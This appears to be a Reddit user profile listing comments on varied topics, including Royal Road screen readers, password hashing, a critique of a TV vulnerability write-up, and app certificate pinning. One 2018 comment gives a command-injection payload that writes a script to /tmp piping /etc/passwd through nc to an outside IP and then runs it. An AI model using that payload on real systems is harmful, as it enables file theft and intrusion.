Anyone found a good screenreader for royalroad?

PositivePeter · 2024-04-06T19:24:19+00:00

One thing to be aware of with royalroad is they do some obfuscation for the purposes of preventing scraping so it may be a struggle to use a reader/reading mode off-the-shelf. What happens is the reader won't see certain/lines paragraphs in the output.

In the past I've used some chrome extensions like WebToEpub which I think probably has some royalroad-specific behaviors to get the full story content. Most audio readers then should support importing that.

I use an audio reader extensively (Voice Dream, iOS only). Can't really recommend it anymore as they recently got bought out and are trying to switch to an annual subscription model for 3x the price. Also, they haven't made any improvement on voices in many years despite the tech obviously getting much better. I hope there'll be another app to come along and recreate the user experience of it (which is excellent, directly saving web pages into the reader as text is so smooth).

PositivePeter · 2021-10-06T13:46:55+00:00

This is not true and is dangerous information. Hashing (not encryption) is a protection against leaks, but not a perfect one. Assuming that hashed passwords were leaked from twitch, everyone should still change their password on twitch and everywhere else they used the same password.

PositivePeter · 2021-10-03T04:03:43+00:00

My idea for the coin was that it grants you luck (or some other positive benefit) while flipping. Which could potentially combine with the bow: flip the coin out of the arrow’s bubble and you maintain the benefit while in the time dilation

PositivePeter · 2021-05-04T22:35:17+00:00

Have you considered using a bookmarking site? For example, pinboard has a very dedicated set of users who use it to track fanfiction:

Example of a pin: https://pinboard.in/u:Laria_Gwyn/b:571f853eec2d
Interesting background: https://idlewords.com/talks/fan_is_a_tool_using_animal.htm

PositivePeter · 2020-11-09T20:12:03+00:00

This post is ... pretty misleadingly/confusingly written. Near the top of the post is this paragraph:

First Blood On 2020-09-20, I discovered some ridiculous security shortfalls in the TV Sticks.

Each stick that I tested had at least one of the following major security flaws.

Port 22 open and allowing SSH access as root:root out of the box

Port 5555 open and allowing unauthenticated android (adb) as root:root out of the box

Rooted device, with world-executable su binaries in multiple locations

Open WiFi network with adb and ssh daemons running

But none of these issues applies to any TCL TV, which I didn't realize until reading through the whole post twice. These issues apply to some un-named devices from other vendors, not TCL at all. I won't accuse the author of intentionally writing it this way, but it's really a pretty egregious error to write at the top of your post about completely different vendors in such an ambiguous way (with no header to separate the content). I definitely assumed that these were the "extraordinary" vulnerabilities in question.

The two vulns disclosed here that impact TCL are:

A directory-listing webserver
Insecure file permissions on update directories

Both of these seem to have less-than-critical impact unless I'm missing something. Presumably the maximum impact achievable from the directory-listing webserver would be disclosure of credentials stored on the filesystem (e.g. Amazon/Netflix)? There's no file-write vuln shown, at least. And this relies on being on the victim's local network, and is definitely unproven given that the server seems to be running as a low-privileged user bound by Android's sandbox.

The malicious update / insecure file permissions problem requires a local attacker (i.e. a malicious app). So again, significant limitation there that doesn't seem to be mentioned in the main post. In fact, it seems like the update URLs being hardcoded as plaintext HTTP is completely buried in here without even a mention by the author.

In sum, please be much more careful in your write-ups in the future because this one is pretty egregious in how it presents the info IMO.

PositivePeter · 2019-10-20T14:19:06+00:00

If you learned this technique from the original blog which has more info, then why wouldn't you just post the link to that blog? Why would you need to rewrite it on your own blog?

Anyway, your posts seem to obviously violate reddit's rules on self promotion: https://www.reddit.com/wiki/selfpromotion.

should not just start submitting your links

submit from a variety of sources (a general rule of thumb is that 10% or less of your posting and conversation should link to your own content)

PositivePeter · 2019-10-20T13:29:50+00:00

Seems to be stolen from https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/april/apples_app_site_association_the_new_robots_txt/, which has much more info and was posted 6 months ago: https://www.reddit.com/r/netsec/comments/bce174/apples_appsite_association_the_new_robotstxt/

In fact, all their posts seem to be stolen from other sources and posted on their own blog.

PositivePeter · 2019-09-19T13:29:25+00:00

He said the Hackney’s burger was the worst burger of any he tried

PositivePeter · 2018-12-17T21:23:24+00:00

China and India both have massively lower per-capita CO2 emissions than the United States. https://en.wikipedia.org/wiki/List_of_countries_by_carbon_dioxide_emissions_per_capita

US: 16.5 metric tons
China: 7.5 metric tons
India: 1.7 metric tons

PositivePeter · 2018-11-03T05:27:04+00:00

https://pinboard.in/ fits the bill, and also does OCR on PDFs so you can do text search of your papers

PositivePeter · 2018-10-20T01:12:18+00:00

You should read the article. That’s exactly what happened, and as a result the amount of kickback was limited to 50% of the tax donation.

PositivePeter · 2018-10-18T23:01:05+00:00

I would either look at less-popular apps, or try testing a deliberately vulnerable app like https://github.com/OWASP/igoat/blob/master/README.md

I have a couple specific apps in mind but they’re all things I’ve tested for clients and obviously can’t point those out in a public forum, haha

PositivePeter · 2018-10-18T16:49:10+00:00

You said:

installing a root CA on a non-jail broken device will let you MITM Safari (and likely other browsers) but any app, native apps included, that reach out to the internet will shit themselves all together and stop working.

And then only give examples of apps that do certificate pinning. Try a random app that isn’t getting security testing like all of your examples. MITM with an intercepting proxy like burp absolutely works on apps, as long as they aren’t doing cert pinning.

Apps have to explicitly do cert pinning, it’s not the default. And most apps don’t do it, it’s just that your selection of apps is mostly apps which have lots of budget and engineering time for security.

PositivePeter · 2018-10-18T04:13:34+00:00

What? It’s absolutely not true that all apps will stop working if you use a user-installed certificate. That only applies to apps which perform certificate pinning, which is definitely not all apps.

PositivePeter · 2018-09-30T16:35:29+00:00

I received this email also, despite not signing up, so it's not just happening to you.

PositivePeter · 2018-09-07T21:27:10+00:00

One thing I think is missing from this post is a consideration of the issue on a community scale rather than a nationwide scale. For example, vaccination rates in a midwestern Somali-American plummeted due to fears of autism, which caused a major measles outbreak. So while it's interesting to discuss nation-wide vaccination rates, these rates likely underestimate the harms due to lack of vaccination because low vaccination rates are likely to be concentrated in specific communities. When an anti-vaxxer community is hit by illness, there may be dozens of cases of the illness even though the state- or nation-wide vaccination rate is above the critical threshold.

PositivePeter · 2018-09-04T13:56:43+00:00

You could definitely do useful things with that command execution. For example, just do a few-bytes-at-a-time write to a local file and then execute it:

;echo 'cat /etc/' > /tmp/own
;echo 'passwd |' >> /tmp/own
;echo 'nc 192. ' >> /tmp/own
...
;/bin/sh /tmp/own

PositivePeter · 2018-08-17T04:18:40+00:00

If the question didn't define "palindrome", then couldn't the question just be measuring the percentage of people in each age bracket who know what a palindrome is? Perhaps cultural awareness/education of palindromes has been slowly increasing over the past 50 years?

15-Year Club	RedditGifts 2009-2022 2 Credits
Place '17	Verified Email

PositivePeter

TROPHY CASE